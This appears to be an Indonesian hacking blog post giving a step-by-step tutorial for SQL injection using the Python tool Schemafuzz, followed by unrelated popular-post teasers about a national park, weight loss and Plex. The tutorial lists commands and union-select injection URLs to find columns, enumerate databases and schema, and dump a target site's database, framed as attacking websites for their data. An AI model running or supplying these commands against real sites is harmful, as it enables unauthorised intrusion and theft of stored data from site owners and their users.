SQl injection dengan Schemafuzz


Schemafuzz ini merupakan sebuah tool hacking karya anak Darkc0de yang menggunakan bahasa pemograman python, penggunannya pun cukup mudah.

Mari kita mulai, karena disini kita menggunakan python sebagai alatnya, maka download terlebih dahulu, kamu bisa mendownloadnya di www.python.org/getit.

 kemudian jika sudah selesai install file exe python. Jika sudah selesai instalasinya, kemudian download script schemafuzz, cari digoogle banyak, ekstensinya .py.

Lalu letakkan file schemafuzz.py di folder python, letaknya di C:\Python25 dan janngan lupa mengcopy cmd.exe ke direktori yg sama. Jika semua sudah siap dan terkumpul dalam satu folder, klik dua kali di cmd.exe

  •  Langkah yang pertama pada schemafuzz adalah mencari kolom, pada layer cmd perintah yang harus dikeik adalah: schemafuzz.py –findcol –u “http//contohweb.net/katakunci.php?id=1”
  •  Tunggu sampai schemafuzz memberikan hasi berupa kolom yang ada disitus itu.
  • Misal jika ditemukan 3 buah kolom, dan url yang bisa kita eksploitasi adalah sebagai berikut:http://contohblog.net/katakunci.php?id=2496+union+all+select+0.darkc0de.2
  • Kemudian setelah menemukan berapa kolom yang ada selanjutnya ketik : schemafuzz.py –u
http://contohblog.net/katakunci.php?id=2496+union+all+select+0.darkc0de.2 –dbs
Perintah diatas digunakan untk mencari nama database yang ada pada situs itu.

Selanjutnya jika database yang bisa kamu serang adalah katakunci_bug. Berarti situs itu hanya memiliki data servernya, sehingga hanya memiliki satu database untuk menyimpan data.

  • Selanjutnya kamu cuma tinggal mencari nama table serta kolom menampilkan data. Untuk mencarinya kamu bisa menggunakan perintah berikut: schemafuzz.py –u ”url”-schema -0 nama_database
Contoh:
Schemafuzz.py –u
http://contohblog.net/katakunci.php?id=2496+union+all+select+0.darkc0de.2 –schema -0 katakunci_bug

Selanjutnya, kamu akan melihat hasil nama table dan kolom yang ada pada database katakunci_bug, tanpa susah melakukan injeksi manual.
  • Yang terakhir kamu cukup mengetik perintah:
Schemafuzz.py –u
http://contohblog.net/katakunci.php?id=2496+union+all+select+0.darkc0de.2 –dump –D katakunci_bug
Dan kamupun mendapat data yang diinginkan, You got it!!!

Comments

Post a Comment

Popular Posts

Taman Nasional Gunung Leuser

Image
Taman Nasional Gunung Leuser adalah salah satu dari kawasan pelestarian alam yang ada di Indonesia seluas 1.094.692 hektar. Dalam Administrasinya terletak di dua provinsi, yaitu provinsi hutan Aceh dan Sumatra Utara yang mendominasi berada di Aceh Timur, Aceh Selatan, Sumatera Utara dan Langkat, dikenal penghasil kopi kelas dunia dan tembakau yang berkualitas. Leuser Kalian bisa memulai petualangan di Taman Nasional ini melalui Bukit Lawang, Sumatera Utara, di mana tempat berdiamnya orang utan. Hutan Gunung Leuser juga memiliki kekayaan buah tropis seperti rambutan , durian , mangga , alpukat , jeruk , pepaya , dan jambu biji . Orang utan Orang utan Taman Nasional Gunung  Leuser dan daerah sekitarnya dikenal sebagai ekosistem Leuser yang menjadi Situs Warisan Dunia UNESCO . Ada sekitar 130 spesies hewan dapat diidentifikasi di Taman Nasional Gunung Leuser, yaitu: harimau Sumatera, gajah, badak bercula satu, siamang, kera ekor panjang, macan tutul, ular, ika...
Read more

Ocobot : 9 TIPS ON HOW TO NATURALLY BODY SLIMMING QUICKLY AND EASILY

Image
Tips on how to naturally body slimming quickly and easily. For slimming the body, don't just focus on sports or on the foods that we consume. But we live a lifestyle that should also get attention. In addition, genetic factors also should not be forgotten, remember this is the great influence that determines whether our bodies readily skinny or fat. Then, you also may not constitute the metabolism in your body. At the very least, you should know that men have a faster metabolism compared to women. So they tend to be easier to lose weight by doing the same activity with women such as exercise and diet. So you can look slimmer, there are several ways a slimming body that is effective and can be done easily in addition can provide very fast results. Here are some of his tips. 1. Do not forget breakfast Habit people slim down was breakfast in the morning. But remember, try to avoid too much breakfast carbs and vice versa, you are advised to consume a lot of foods that contain high pr...
Read more

Plex Advances Cord-Cutting Case With Live OTA TV 2017

Image
Video streaming service Plex on Thursday announced the availability of a beta version of its Plex Live TV. The live-TV streaming launch follows last year's introduction of the Plex DVR, which provides users with free over-the-air access to 86 of Nielsen's 100 most watched shows in the United States. Plex Advances Cord-Cutting Case With Live OTA TV The Plex DVR service allows users to manage their recorded programming via Android TV, iOS devices, Windows and Mac, as well a variety of set-top boxes, such as Roku, Chromecast, Amazon Fire and Apple TV, and the Xbox and PlayStation gaming systems. Plex DVR is supported by many smart TVs as well. Plex Live TV currently is available only on Android TV and iOS devices, while recorded TV shows are available on the aforementioned devices. To utilize the service, users need to install a digital antenna and a digital tuner to receive the over-the-air signals. The new Plex Live TV allows users to access local news and sports from a...
Read more